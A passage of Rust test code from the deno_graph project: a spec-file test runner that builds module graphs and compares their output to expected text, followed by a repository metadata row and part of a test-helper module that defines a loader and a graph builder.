use deno_graph::fast_check::FastCheckCacheModuleItem;
use deno_graph::packages::NewestDependencyDateOptions;
use deno_graph::source::DEFAULT_JSR_URL;
use deno_graph::source::LoaderChecksum;
use deno_graph::source::Source;
use deno_graph::source::recommended_registry_package_url;
use deno_graph::source::recommended_registry_package_url_to_nv;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use file_test_runner::RunOptions;
use file_test_runner::TestResult;
use file_test_runner::collect_and_run_tests;
use file_test_runner::collection::CollectOptions;
use file_test_runner::collection::CollectedTest;
use file_test_runner::collection::strategies::TestPerFileCollectionStrategy;
use helpers::TestLoader;
use indexmap::IndexMap;
use pretty_assertions::assert_eq;
use serde::Deserialize;
use serde::Serialize;
use serde::de::DeserializeOwned;
use url::Url;
use crate::helpers::TestBuilder;
mod helpers;
fn main() {
// set log level with RUST_LOG env var (ex. `RUST_LOG=trace`)
env_logger::builder()
.filter(Some("tracing::span"), log::LevelFilter::Off)
.filter(Some("swc_ecma_codegen"), log::LevelFilter::Off)
.init();
// Disable colors so that deno_ast diagnostics do not contain escape sequences.
// TODO: Audit that the environment access only happens in single-threaded code.
unsafe { std::env::set_var("NO_COLOR", "true") };
collect_and_run_tests(
CollectOptions {
base: "tests/specs".into(),
strategy: Box::new(TestPerFileCollectionStrategy {
file_pattern: Some(
"^*.[/\\\\]specs[/\\\\](:?graph|symbols)[/\\\\].*$".to_owned(),
),
}),
filter_override: None,
},
RunOptions { parallel: true },
|test| {
if test.name.starts_with("specs::graph") {
TestResult::from_maybe_panic(AssertUnwindSafe(|| {
run_graph_test(test);
}))
} else if test.name.starts_with("specs::symbols") {
TestResult::from_maybe_panic(AssertUnwindSafe(|| {
run_symbol_test(test);
}))
} else {
TestResult::Failed {
output: format!("Unknown test kind: {}", test.name).into_bytes(),
}
}
},
)
}
fn run_graph_test(test: &CollectedTest) {
let file_text = test.read_to_string().unwrap();
let mut spec = parse_spec(&test.path, file_text);
spec.fill_jsr_meta_files_with_checksums();
let mut builder = TestBuilder::new();
builder.with_loader(|loader| {
add_spec_files_to_loader(&spec.files, loader);
});
builder.workspace_members(spec.workspace_members.clone());
builder.lockfile_jsr_packages(spec.lockfile_jsr_packages.clone());
if let Some(options) = &spec.options {
if let Some(entrypoint) = &options.entrypoint {
builder.entry_point(entrypoint);
}
builder.newest_dependency_date(
options.newest_dependency_date.clone().unwrap_or_default(),
);
builder.skip_dynamic_deps(options.skip_dynamic_deps);
builder.unstable_bytes_imports(options.unstable_bytes_imports);
builder.unstable_text_imports(options.unstable_text_imports);
builder.workspace_fast_check(options.workspace_fast_check);
builder.fast_check_cache(options.fast_check_cache);
if let Some(checksums) = options.remote_checksums.as_ref() {
builder.ensure_locker();
for (specifier, checksum) in checksums {
builder.add_remote_checksum(specifier, checksum);
}
}
if let Some(checksums) = options.pkg_checksums.as_ref() {
builder.ensure_locker();
for (pkg_nv, checksum) in checksums {
builder.add_pkg_manifest_checksum(pkg_nv, checksum);
}
}
}
let rt = tokio::runtime::Builder::new_current_thread()
.enable_all()
.build()
.unwrap();
let result = rt.block_on(async { builder.build().await });
let mut output_text = serde_json::to_string_pretty(&result.graph).unwrap();
output_text.push('\n');
// include the checksums if non-empty
if let Some(locker) = &result.locker {
{
let sorted_checksums = locker.remote().iter().collect::<BTreeMap<_, _>>();
if !sorted_checksums.is_empty() {
output_text.push_str("\nremote checksums:\n");
output_text
.push_str(&serde_json::to_string_pretty(&sorted_checksums).unwrap());
output_text.push('\n');
}
}
{
let sorted_checksums =
locker.pkg_manifests().iter().collect::<BTreeMap<_, _>>();
if !sorted_checksums.is_empty() {
output_text.push_str("\npkg manifest checksums:\n");
output_text
.push_str(&serde_json::to_string_pretty(&sorted_checksums).unwrap());
output_text.push('\n');
}
}
}
// include the list of jsr dependencies
let jsr_deps = result
.graph
.packages
.packages_with_deps()
.map(|(k, deps)| {
(k.to_string(), {
let mut deps = deps.map(|d| d.to_string()).collect::<Vec<_>>();
deps.sort();
deps
})
})
.filter(|(_, v)| !v.is_empty())
.collect::<BTreeMap<_, _>>();
if !jsr_deps.is_empty() {
output_text.push_str("\njsr deps: ");
output_text.push_str(&format!("{:#?}", jsr_deps));
output_text.push('\n');
}
// now the fast check modules
let fast_check_modules = result.graph.modules().filter_map(|module| {
let module = module.js()?;
let fast_check = module.fast_check.as_ref()?;
Some((module, fast_check))
});
for (module, fast_check) in fast_check_modules {
output_text.push_str(&format!("\nFast check {}:\n", module.specifier));
match fast_check {
deno_graph::FastCheckTypeModuleSlot::Module(fast_check) => {
output_text.push_str(&format!(
"{}\n{}",
indent(
&serde_json::to_string_pretty(&fast_check.dependencies).unwrap()
),
if fast_check.source.is_empty() {
" <empty>".to_string()
} else {
indent(&fast_check.source)
},
));
if let Some(dts) = &fast_check.dts {
let source_map = SourceMap::single(
module.specifier.clone(),
module.source.text.to_string(),
);
let EmittedSourceText { text, .. } = emit(
(&dts.program).into(),
&dts.comments.as_single_threaded(),
&source_map,
&EmitOptions {
remove_comments: false,
source_map: deno_ast::SourceMapOption::None,
..Default::default()
},
)
.unwrap();
if !text.is_empty() {
output_text.push_str(&indent("--- DTS ---\n"));
output_text.push_str(&indent(&text));
}
if !dts.diagnostics.is_empty() {
output_text.push_str(&indent("--- DTS Diagnostics ---\n"));
let message = dts
.diagnostics
.iter()
.map(|d| {
let range = d.range();
format!(
"{}\n at {}@{}",
d, range.specifier, range.range.start
)
})
.collect::<Vec<_>>()
.join("\n\n");
output_text.push_str(&indent(&message));
}
}
}
deno_graph::FastCheckTypeModuleSlot::Error(diagnostics) => {
let mut printed_diagnostics = "".to_owned();
for diagnostic in diagnostics {
write!(&mut printed_diagnostics, "{}", diagnostic.display()).unwrap();
}
output_text.push_str(&indent(&printed_diagnostics));
}
}
}
if let Some(fast_check_cache) = result.fast_check_cache.as_ref() {
output_text.push_str("\n== fast check cache ==\n");
for (key, item) in fast_check_cache.inner.borrow().iter() {
output_text.push_str(&format!(
"{:?}:\n Deps - {}\n Modules: {}\n",
key,
serde_json::to_string(&item.dependencies).unwrap(),
serde_json::to_string(
&item
.modules
.iter()
.map(|(url, module_item)| (
url.as_str(),
match module_item {
FastCheckCacheModuleItem::Info(_) => "info",
FastCheckCacheModuleItem::Diagnostic(_) => "diagnostic",
}
))
.collect::<Vec<_>>()
)
.unwrap()
));
}
}
if !output_text.ends_with('\n') {
output_text.push('\n');
}
let update = std::env::var("UPDATE").as_deref() == Ok("1");
let spec = if update {
let mut spec = spec;
spec.output_file.content = SpecFileContent::Inline(output_text.clone());
std::fs::write(&test.path, spec.emit()).unwrap();
spec
} else {
spec
};
assert_eq!(
&output_text,
spec.output_file.content.as_str(),
"Should be same for {}",
test.path.display()
);
}
fn run_symbol_test(test: &CollectedTest) {
let file_text = test.read_to_string().unwrap();
let mut spec = parse_spec(&test.path, file_text);
spec.fill_jsr_meta_files_with_checksums();
let mut builder = TestBuilder::new();
if spec.files.iter().any(|f| f.specifier == "mod.js") {
// this is for the TypesEntrypoint test
builder.entry_point("file:///mod.js");
builder.entry_point_types("file:///mod.d.ts");
}
if let Some(options) = &spec.options {
if let Some(entrypoint) = &options.entrypoint {
builder.entry_point(entrypoint);
}
builder.workspace_fast_check(options.workspace_fast_check);
}
builder.with_loader(|loader| {
add_spec_files_to_loader(&spec.files, loader);
});
let rt = tokio::runtime::Builder::new_current_thread()
.enable_all()
.build()
.unwrap();
let result = rt.block_on(async { builder.symbols().await });
let spec = if std::env::var("UPDATE").as_deref() == Ok("1") {
let mut spec = spec;
spec.output_file.content = SpecFileContent::Inline(result.output.clone());
std::fs::write(&test.path, spec.emit()).unwrap();
spec
} else {
spec
};
assert_eq!(
&result.output,
spec.output_file.content.as_str(),
"Should be same for {}",
test.path.display()
);
}
#[derive(Debug, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct SpecOptions {
#[serde(default)]
#[serde(skip_serializing_if = "Option::is_none")]
pub entrypoint: Option<String>,
#[serde(default)]
#[serde(skip_serializing_if = "Option::is_none")]
pub newest_dependency_date: Option<NewestDependencyDateOptions>,
#[serde(default)]
#[serde(skip_serializing_if = "Option::is_none")]
pub remote_checksums: Option<HashMap<String, String>>,
#[serde(default)]
#[serde(skip_serializing_if = "Option::is_none")]
pub pkg_checksums: Option<HashMap<String, String>>,
#[serde(default)]
#[serde(skip_serializing_if = "is_false")]
pub workspace_fast_check: bool,
#[serde(default)]
#[serde(skip_serializing_if = "is_false")]
pub fast_check_cache: bool,
#[serde(default)]
#[serde(skip_serializing_if = "is_false")]
pub skip_dynamic_deps: bool,
#[serde(default)]
#[serde(skip_serializing_if = "is_false")]
pub unstable_bytes_imports: bool,
#[serde(default)]
#[serde(skip_serializing_if = "is_false")]
pub unstable_text_imports: bool,
}
fn is_false(v: &bool) -> bool {
!v
}
pub struct Spec {
pub options: Option<SpecOptions>,
pub files: Vec<SpecFile>,
pub output_file: SpecFile,
pub workspace_members: Vec<WorkspaceMember>,
pub lockfile_jsr_packages: BTreeMap<PackageReq, PackageNv>,
}
impl Spec {
pub fn emit(&self) -> String {
let mut text = String::new();
if let Some(options) = &self.options {
text.push_str("~~ ");
if options.remote_checksums.is_some() || options.pkg_checksums.is_some() {
text.push_str(&serde_json::to_string_pretty(options).unwrap());
} else {
text.push_str(&serde_json::to_string(options).unwrap());
}
text.push_str(" ~~");
text.push('\n');
}
if !self.workspace_members.is_empty() {
text.push_str("# workspace_members\n");
text.push_str(
&serde_json::to_string_pretty(&self.workspace_members).unwrap(),
);
text.push_str("\n\n");
}
for file in &self.files {
text.push_str(&file.emit());
text.push('\n');
}
text.push_str(&self.output_file.emit());
if !text.ends_with('\n') {
text.push('\n');
}
if !self.lockfile_jsr_packages.is_empty() {
text.push_str("\n# lockfile_jsr_packages\n");
text.push_str(
&serde_json::to_string_pretty(&self.lockfile_jsr_packages).unwrap(),
);
text.push('\n');
}
text
}
/// Fills the `manifest` field in the `_meta.json` files with the checksums
/// so that we don't need to bother having them in the tests.
pub fn fill_jsr_meta_files_with_checksums(&mut self) {
for (nv, checksums_by_files) in self.get_jsr_checksums() {
let base_specifier =
recommended_registry_package_url(&DEFAULT_JSR_URL, &nv);
let meta_file = base_specifier
.join(&format!("../{}_meta.json", nv.version))
.unwrap();
let meta_file = self
.files
.iter_mut()
.find(|f| f.url() == meta_file)
.unwrap_or_else(|| panic!("Could not find in specs: {}", meta_file));
let mut meta_value = serde_json::from_str::<
BTreeMap<String, serde_json::Value>,
>(meta_file.content.as_str())
.unwrap();
let manifest = meta_value
.entry("manifest".to_string())
.or_insert_with(|| serde_json::Value::Object(Default::default()))
.as_object_mut()
.unwrap();
for (file, checksum) in checksums_by_files {
if !manifest.contains_key(&file) {
manifest.insert(file, checksum);
}
}
// use the original text as the emit text so we don't
// end up with these hashes in the output
meta_file.emit_text = Some(
std::mem::replace(
&mut meta_file.content,
SpecFileContent::Inline(
serde_json::to_string_pretty(&meta_value).unwrap(),
),
)
.as_str()
.to_string(),
);
}
}
pub fn get_jsr_checksums(
&self,
) -> BTreeMap<PackageNv, BTreeMap<String, serde_json::Value>> {
let mut checksums_by_package: BTreeMap<
PackageNv,
BTreeMap<String, serde_json::Value>,
> = Default::default();
for file in &self.files {
if let Some(nv) =
recommended_registry_package_url_to_nv(&DEFAULT_JSR_URL, &file.url())
{
let base_specifier =
recommended_registry_package_url(&DEFAULT_JSR_URL, &nv);
let relative_url = file
.url()
.to_string()
.strip_prefix(base_specifier.to_string().strip_suffix('/').unwrap())
.unwrap()
.to_string();
checksums_by_package.entry(nv.clone()).or_default().insert(
relative_url,
serde_json::json!({
"size": file.content.len(),
"checksum": format!("sha256-{}", LoaderChecksum::r#gen(file.content.as_ref())),
}),
);
}
}
checksums_by_package
}
}
fn add_spec_files_to_loader(
files: &[crate::SpecFile],
loader: &mut TestLoader,
) {
for file in files {
let source = match file.headers.get("location") {
Some(location) => {
let location = if location.starts_with("./") {
file.url().join(location).unwrap().to_string()
} else {
location.to_string()
};
Source::Redirect(location)
}
None => Source::Module {
specifier: file.url().to_string(),
maybe_headers: Some(file.headers.clone().into_iter().collect()),
content: file.content.clone(),
},
};
if file.is_cache() {
loader.cache.add_source(file.url(), source);
} else {
loader.remote.add_source(file.url(), source);
}
}
}
#[derive(Debug)]
pub struct SpecFileSource {
specified_path: String,
referrer_path: PathBuf,
text: OnceCell<String>,
bytes: OnceCell<Vec<u8>>,
}
impl SpecFileSource {
fn new(specified_path: String, referrer_path: PathBuf) -> Self {
Self {
specified_path,
referrer_path,
text: Default::default(),
bytes: Default::default(),
}
}
fn text(&self) -> &String {
self
.text
.get_or_init(|| String::from_utf8_lossy(self.bytes()).to_string())
}
fn bytes(&self) -> &Vec<u8> {
self.bytes.get_or_init(|| {
std::fs::read(deno_path_util::normalize_path(Cow::Owned(
self.referrer_path.join("..").join(&self.specified_path),
)))
.unwrap()
})
}
fn len(&self) -> usize {
self.bytes().len()
}
}
#[derive(Debug, Clone)]
pub enum SpecFileContent {
Inline(String),
Source(Rc<SpecFileSource>),
}
impl SpecFileContent {
fn as_str(&self) -> &str {
match self {
Self::Inline(s) => s.as_str(),
Self::Source(s) => s.text(),
}
}
fn len(&self) -> usize {
match self {
Self::Inline(s) => s.len(),
Self::Source(s) => s.len(),
}
}
}
impl AsRef<str> for SpecFileContent {
fn as_ref(&self) -> &str {
self.as_str()
}
}
impl AsRef<[u8]> for SpecFileContent {
fn as_ref(&self) -> &[u8] {
match self {
Self::Inline(s) => s.as_bytes(),
Self::Source(s) => s.bytes(),
}
}
}
#[derive(Debug)]
pub struct SpecFile {
pub specifier: String,
pub content: SpecFileContent,
/// Text to use when emitting the spec file.
pub emit_text: Option<String>,
pub headers: IndexMap<String, String>,
}
impl SpecFile {
pub fn emit(&self) -> String {
match &self.content {
SpecFileContent::Inline(content) => {
let mut text = format!("# {}\n", self.specifier);
if !self.headers.is_empty() {
text.push_str(&format!(
"HEADERS: {}\n",
serde_json::to_string(&self.headers).unwrap()
));
}
text.push_str(self.emit_text.as_deref().unwrap_or(content.as_str()));
text
}
SpecFileContent::Source(source) => {
format!("# {} <= {}\n", &self.specifier, &source.specified_path)
}
}
}
pub fn url(&self) -> Url {
let specifier = self
.specifier
.strip_prefix("cache:")
.unwrap_or(&self.specifier);
if !specifier.starts_with("http:")
&& !specifier.starts_with("https:")
&& !specifier.starts_with("file:")
{
Url::parse(&format!("file:///{}", specifier)).unwrap()
} else {
Url::parse(specifier).unwrap()
}
}
pub fn is_cache(&self) -> bool {
self.specifier.starts_with("cache:")
}
}
pub fn parse_spec(path: &Path, text: String) -> Spec {
let mut files = Vec::new();
let mut current_file = None;
let mut options: Option<SpecOptions> = None;
let mut text = text.as_str();
if text.starts_with("~~ ") {
let end = text.find(" ~~\n").unwrap();
options = Some(serde_json::from_str(&text[3..end]).unwrap());
text = &text[end + 4..];
}
for line in text.split('\n') {
if let Some(specifier_line) = line.strip_prefix("# ") {
if let Some(file) = current_file.take() {
files.push(file);
}
if let Some((specifier, resource_path)) = specifier_line.split_once("<=")
{
let specifier = specifier.trim();
let resource_path = resource_path.trim();
current_file = Some(SpecFile {
specifier: specifier.to_string(),
content: SpecFileContent::Source(Rc::new(SpecFileSource::new(
resource_path.to_string(),
path.to_path_buf(),
))),
emit_text: None,
headers: Default::default(),
});
} else {
current_file = Some(SpecFile {
specifier: specifier_line.to_string(),
content: SpecFileContent::Inline(String::new()),
emit_text: None,
headers: Default::default(),
});
}
} else if let Some(headers) = line.strip_prefix("HEADERS: ") {
current_file.as_mut().unwrap().headers =
serde_json::from_str(headers).unwrap();
} else {
let current_file = current_file.as_mut().unwrap();
match &mut current_file.content {
SpecFileContent::Inline(content) => {
if !content.is_empty() {
content.push('\n');
}
content.push_str(line);
}
SpecFileContent::Source(_) => {
if !line.is_empty() {
panic!(
"Error parsing spec: Unexpected inline input for specifier \"{}\", which was set to be read from an external file.",
¤t_file.specifier
);
}
}
}
}
}
files.push(current_file.unwrap());
let output_file =
files.remove(files.iter().position(|f| f.specifier == "output").unwrap());
let workspace_members = take_file(&mut files, "workspace_members");
let lockfile_jsr_packages = take_file(&mut files, "lockfile_jsr_packages");
Spec {
options,
files,
output_file,
workspace_members,
lockfile_jsr_packages,
}
}
fn take_file<T: Default + DeserializeOwned>(
files: &mut Vec<SpecFile>,
name: &str,
) -> T {
if let Some(index) = files.iter().position(|f| f.specifier == name) {
let file = files.remove(index);
serde_json::from_slice(file.content.as_ref()).unwrap()
} else {
Default::default()
}
}
fn indent(text: &str) -> String {
text
.split('\n')
.map(|l| format!(" {}", l).trim_end().to_string())
.collect::<Vec<_>>()
.join("\n")
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/helpers/mod.rs | tests/helpers/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::cell::RefCell;
use std::collections::BTreeMap;
use std::sync::Arc;
use async_trait::async_trait;
use deno_ast::ModuleSpecifier;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::NpmLoadError;
use deno_graph::NpmResolvePkgReqsResult;
use deno_graph::WorkspaceFastCheckOption;
use deno_graph::WorkspaceMember;
use deno_graph::ast::CapturingModuleAnalyzer;
use deno_graph::fast_check::FastCheckCache;
use deno_graph::fast_check::FastCheckCacheItem;
use deno_graph::fast_check::FastCheckCacheKey;
use deno_graph::packages::JsrVersionResolver;
use deno_graph::packages::NewestDependencyDateOptions;
use deno_graph::source::CacheInfo;
use deno_graph::source::CacheSetting;
use deno_graph::source::HashMapLocker;
use deno_graph::source::LoadFuture;
use deno_graph::source::LoadOptions;
use deno_graph::source::Loader;
use deno_graph::source::LoaderChecksum;
use deno_graph::source::Locker;
use deno_graph::source::MemoryLoader;
use deno_graph::source::NpmResolver;
use deno_semver::Version;
use deno_semver::jsr::JsrPackageReqReference;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use futures::FutureExt;
#[derive(Default)]
pub struct TestLoader {
pub cache: MemoryLoader,
pub remote: MemoryLoader,
}
impl Loader for TestLoader {
fn get_cache_info(&self, specifier: &ModuleSpecifier) -> Option<CacheInfo> {
self.cache.get_cache_info(specifier)
}
fn load(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> LoadFuture {
let checksum = options.maybe_checksum.clone();
let future = match options.cache_setting {
// todo(dsherret): in the future, actually make this use the cache
CacheSetting::Use => self.remote.load(specifier, options),
// todo(dsherret): in the future, make this update the cache
CacheSetting::Reload => self.remote.load(specifier, options),
CacheSetting::Only => self.cache.load(specifier, options),
};
async move {
let response = future.await?;
if let Some(deno_graph::source::LoadResponse::Module { content, .. }) =
&response
&& let Some(checksum) = checksum
{
checksum.check_source(content)?;
}
Ok(response)
}
.boxed_local()
}
}
#[cfg(feature = "symbols")]
pub mod symbols {
pub struct SymbolsResult {
#[allow(unused)]
pub output: String,
}
}
pub struct BuildResult {
#[allow(unused)]
pub locker: Option<HashMapLocker>,
pub graph: ModuleGraph,
pub analyzer: CapturingModuleAnalyzer,
#[allow(unused)]
pub fast_check_cache: Option<TestFastCheckCache>,
}
#[cfg(feature = "symbols")]
impl BuildResult {
pub fn root_symbol(&self) -> deno_graph::symbols::RootSymbol<'_> {
self.graph.valid().unwrap(); // assert valid
deno_graph::symbols::RootSymbol::new(&self.graph, &self.analyzer)
}
}
#[derive(Debug)]
pub struct TestNpmResolver;
#[async_trait(?Send)]
impl NpmResolver for TestNpmResolver {
fn load_and_cache_npm_package_info(&self, _package_name: &str) {}
async fn resolve_pkg_reqs(
&self,
package_reqs: &[PackageReq],
) -> NpmResolvePkgReqsResult {
// for now, this requires version reqs that are resolved
NpmResolvePkgReqsResult {
results: package_reqs
.iter()
.map(|pkg_req| {
match Version::parse_from_npm(&pkg_req.version_req.to_string()) {
Ok(version) => Ok(PackageNv {
name: pkg_req.name.clone(),
version,
}),
Err(err) => Err(NpmLoadError::PackageReqResolution(Arc::new(err))),
}
})
.collect::<Vec<_>>(),
dep_graph_result: Ok(()),
}
}
}
#[derive(Default)]
pub struct TestFastCheckCache {
// BTreeMap because the cache items are inserted non-deterministically
pub inner: RefCell<BTreeMap<FastCheckCacheKey, FastCheckCacheItem>>,
}
impl FastCheckCache for TestFastCheckCache {
fn hash_seed(&self) -> &'static str {
"stable-for-tests"
}
fn get(&self, key: FastCheckCacheKey) -> Option<FastCheckCacheItem> {
self.inner.borrow().get(&key).cloned()
}
fn set(&self, key: FastCheckCacheKey, value: FastCheckCacheItem) {
self.inner.borrow_mut().insert(key, value);
}
}
pub struct TestBuilder {
locker: Option<HashMapLocker>,
graph: ModuleGraph,
loader: TestLoader,
entry_point: String,
entry_point_types: String,
fast_check_cache: bool,
lockfile_jsr_packages: BTreeMap<PackageReq, PackageNv>,
newest_dependency_date: NewestDependencyDateOptions,
resolver: Option<Box<dyn deno_graph::source::Resolver>>,
skip_dynamic_deps: bool,
workspace_members: Vec<WorkspaceMember>,
workspace_fast_check: bool,
unstable_bytes_imports: bool,
unstable_text_imports: bool,
}
impl TestBuilder {
pub fn new() -> Self {
Self {
locker: Default::default(),
graph: ModuleGraph::new(GraphKind::All),
loader: Default::default(),
entry_point: "file:///mod.ts".to_string(),
entry_point_types: "file:///mod.ts".to_string(),
fast_check_cache: false,
lockfile_jsr_packages: Default::default(),
newest_dependency_date: Default::default(),
skip_dynamic_deps: false,
resolver: None,
workspace_members: Default::default(),
workspace_fast_check: false,
unstable_bytes_imports: false,
unstable_text_imports: false,
}
}
pub fn with_loader(
&mut self,
mut action: impl FnMut(&mut TestLoader),
) -> &mut Self {
action(&mut self.loader);
self
}
#[allow(unused)]
pub fn entry_point(&mut self, value: impl AsRef<str>) -> &mut Self {
self.entry_point = value.as_ref().to_string();
self
}
#[allow(unused)]
pub fn entry_point_types(&mut self, value: impl AsRef<str>) -> &mut Self {
self.entry_point_types = value.as_ref().to_string();
self
}
#[allow(unused)]
pub fn newest_dependency_date(
&mut self,
value: NewestDependencyDateOptions,
) -> &mut Self {
self.newest_dependency_date = value;
self
}
#[allow(unused)]
pub fn lockfile_jsr_packages(
&mut self,
lockfile_jsr_packages: BTreeMap<PackageReq, PackageNv>,
) -> &mut Self {
self.lockfile_jsr_packages = lockfile_jsr_packages;
self
}
#[allow(unused)]
pub fn fast_check_cache(&mut self, value: bool) -> &mut Self {
self.fast_check_cache = value;
self
}
#[allow(unused)]
pub fn resolver(
&mut self,
resolver: impl deno_graph::source::Resolver + 'static,
) -> &mut Self {
self.resolver = Some(Box::new(resolver));
self
}
#[allow(unused)]
pub fn skip_dynamic_deps(&mut self, value: bool) -> &mut Self {
self.skip_dynamic_deps = value;
self
}
#[allow(unused)]
pub fn workspace_members(
&mut self,
members: Vec<WorkspaceMember>,
) -> &mut Self {
self.workspace_members = members;
self
}
#[allow(unused)]
pub fn workspace_fast_check(&mut self, value: bool) -> &mut Self {
self.workspace_fast_check = value;
self
}
#[allow(unused)]
pub fn unstable_bytes_imports(&mut self, value: bool) -> &mut Self {
self.unstable_bytes_imports = value;
self
}
#[allow(unused)]
pub fn unstable_text_imports(&mut self, value: bool) -> &mut Self {
self.unstable_text_imports = value;
self
}
#[allow(unused)]
pub fn ensure_locker(&mut self) -> &mut Self {
self.locker.get_or_insert_with(Default::default);
self
}
#[allow(unused)]
pub fn add_remote_checksum(
&mut self,
specifier: &str,
checksum: &str,
) -> &mut Self {
let specifier = ModuleSpecifier::parse(specifier).unwrap();
let loader_checksum = LoaderChecksum::new(checksum.to_string());
let checksums = self.locker.get_or_insert_with(Default::default);
checksums.set_remote_checksum(&specifier, loader_checksum);
self
}
#[allow(unused)]
pub fn add_pkg_manifest_checksum(
&mut self,
pkg_nv: &str,
checksum: &str,
) -> &mut Self {
let pkg_nv = PackageNv::from_str(pkg_nv).unwrap();
let loader_checksum = LoaderChecksum::new(checksum.to_string());
let checksums = self.locker.get_or_insert_with(Default::default);
checksums.set_pkg_manifest_checksum(&pkg_nv, loader_checksum);
self
}
pub async fn build(&mut self) -> BuildResult {
let mut graph = self.graph.clone();
for (req, nv) in &self.lockfile_jsr_packages {
graph.packages.add_nv(req.clone(), nv.clone());
}
let entry_point_url = ModuleSpecifier::parse(&self.entry_point).unwrap();
let roots = vec![entry_point_url.clone()];
let capturing_analyzer = CapturingModuleAnalyzer::default();
let workspace_resolver = WorkspaceMemberResolver {
members: self.workspace_members.clone(),
};
graph
.build(
roots.clone(),
Vec::new(),
&self.loader,
deno_graph::BuildOptions {
module_analyzer: &capturing_analyzer,
npm_resolver: Some(&TestNpmResolver),
locker: self.locker.as_mut().map(|l| l as _),
resolver: Some(if let Some(resolver) = &self.resolver {
// providing a custom resolver while using workspace members hasn't been implemented
assert_eq!(self.workspace_members.len(), 0);
&**resolver
} else {
&workspace_resolver
}),
skip_dynamic_deps: self.skip_dynamic_deps,
unstable_bytes_imports: self.unstable_bytes_imports,
unstable_text_imports: self.unstable_text_imports,
jsr_version_resolver: Cow::Owned(JsrVersionResolver {
newest_dependency_date_options: self.newest_dependency_date.clone(),
}),
..Default::default()
},
)
.await;
let fast_check_cache = if self.fast_check_cache {
Some(TestFastCheckCache::default())
} else {
None
};
if graph.module_errors().next().is_none() {
graph.build_fast_check_type_graph(
deno_graph::BuildFastCheckTypeGraphOptions {
fast_check_cache: fast_check_cache.as_ref().map(|c| c as _),
fast_check_dts: !self.fast_check_cache,
jsr_url_provider: Default::default(),
es_parser: Some(&capturing_analyzer),
resolver: None,
workspace_fast_check: if self.workspace_fast_check {
WorkspaceFastCheckOption::Enabled(&self.workspace_members)
} else {
WorkspaceFastCheckOption::Disabled
},
},
);
}
BuildResult {
locker: self.locker.clone(),
graph,
analyzer: capturing_analyzer,
fast_check_cache,
}
}
#[allow(unused)]
#[cfg(feature = "symbols")]
pub async fn symbols(&mut self) -> symbols::SymbolsResult {
fn check_fatal_diagnostics(
module: deno_graph::symbols::ModuleInfoRef,
) -> Vec<String> {
let mut results = Vec::new();
for symbol in module.symbols() {
// ensure all decls have the same name as their symbol
{
let maybe_name = symbol.maybe_name();
for decl in symbol.decls() {
if decl.maybe_name() != maybe_name {
results.push(format!(
"Symbol {:?} with name {:?} had a decl with a different name: {:?}",
symbol.symbol_id(),
maybe_name,
decl.maybe_name(),
));
}
}
}
if let Some(parent_id) = symbol.parent_id() {
let parent_symbol = module.symbol(parent_id).unwrap();
let has_child =
parent_symbol.child_ids().any(|id| id == symbol.symbol_id());
let has_member = parent_symbol
.members()
.iter()
.any(|id| *id == symbol.symbol_id());
let is_definition_decl =
symbol.decls().iter().all(|d| d.kind.is_definition());
if is_definition_decl {
// ensure it's possible to go from a parent to its child
if !has_child && !has_member {
results.push(format!(
"Parent {:#?} does not have child {:#?}",
parent_symbol.symbol_id(),
symbol.symbol_id()
));
}
} else if has_child || has_member {
results.push(format!(
"Parent {:#?} should not have the child or member {:#?}",
parent_symbol.symbol_id(),
symbol.symbol_id()
));
}
if has_child && has_member {
results.push(format!(
"Parent {:?} should not have both a child and a member {:?}",
parent_symbol.symbol_id(),
symbol.symbol_id()
));
}
}
// ensure it's possible to get the module symbol id
{
let mut parent = symbol;
let mut i = 0;
while let Some(parent_id) = parent.parent_id() {
parent = module.symbol(parent_id).unwrap();
if i == 1000 {
results.push(format!(
"Could not find root from symbol: {:?}",
symbol.symbol_id()
));
break;
}
i += 1;
}
}
}
// from the root module, ensure everything is a tree
fn ensure_no_multiple_paths(
module: deno_graph::symbols::ModuleInfoRef,
symbol: &deno_graph::symbols::Symbol,
visited: &mut HashSet<deno_graph::symbols::SymbolId>,
) -> Vec<String> {
let mut results = Vec::new();
if !visited.insert(symbol.symbol_id()) {
results.push(format!(
"Found symbol in multiple paths: {:?}",
symbol.symbol_id()
));
} else {
for id in symbol.child_ids().chain(symbol.members().iter().copied()) {
let symbol = module.symbol(id).unwrap();
results.extend(ensure_no_multiple_paths(module, symbol, visited));
}
}
results
}
results.extend(ensure_no_multiple_paths(
module,
module.module_symbol(),
&mut HashSet::new(),
));
results
}
use std::collections::HashSet;
use deno_graph::symbols::DefinitionOrUnresolved;
use deno_graph::symbols::ModuleInfoRef;
use deno_graph::symbols::ResolveDepsMode;
let build_result = self.build().await;
let graph = &build_result.graph;
let entry_point_types_url =
ModuleSpecifier::parse(&self.entry_point_types).unwrap();
let root_symbol = build_result.root_symbol();
symbols::SymbolsResult {
output: {
let entrypoint_symbol = root_symbol
.module_from_specifier(&entry_point_types_url)
.unwrap();
let mut output_text = String::new();
let mut specifiers =
graph.specifiers().map(|(s, _)| s).collect::<Vec<_>>();
specifiers.sort_unstable();
for specifier in specifiers {
let Some(module) = root_symbol.module_from_specifier(specifier)
else {
continue;
};
let module_output_text = format!(
"{}: {}\n",
specifier.as_str(),
match module {
ModuleInfoRef::Esm(m) => format!("{:#?}", m),
ModuleInfoRef::Json(m) => format!("{:#?}", m),
}
);
output_text.push_str(&module_output_text);
fn get_symbol_deps_text_for_mode(
module: ModuleInfoRef<'_>,
resolve_mode: ResolveDepsMode,
) -> String {
let mut symbol_deps_text = String::new();
for symbol in module.symbols() {
for decl in symbol.decls() {
if let Some((node, source)) = decl.maybe_node_and_source() {
let deps = node.deps(resolve_mode);
if !deps.is_empty() {
symbol_deps_text.push_str(&format!(
"{:?}:{:?} {:?}\n",
symbol.symbol_id(),
decl.range.as_byte_range(source.range().start),
deps
));
}
}
}
}
symbol_deps_text
}
let symbol_deps_text = get_symbol_deps_text_for_mode(
module,
ResolveDepsMode::TypesAndExpressions,
);
if !symbol_deps_text.is_empty() {
output_text.push_str(&format!(
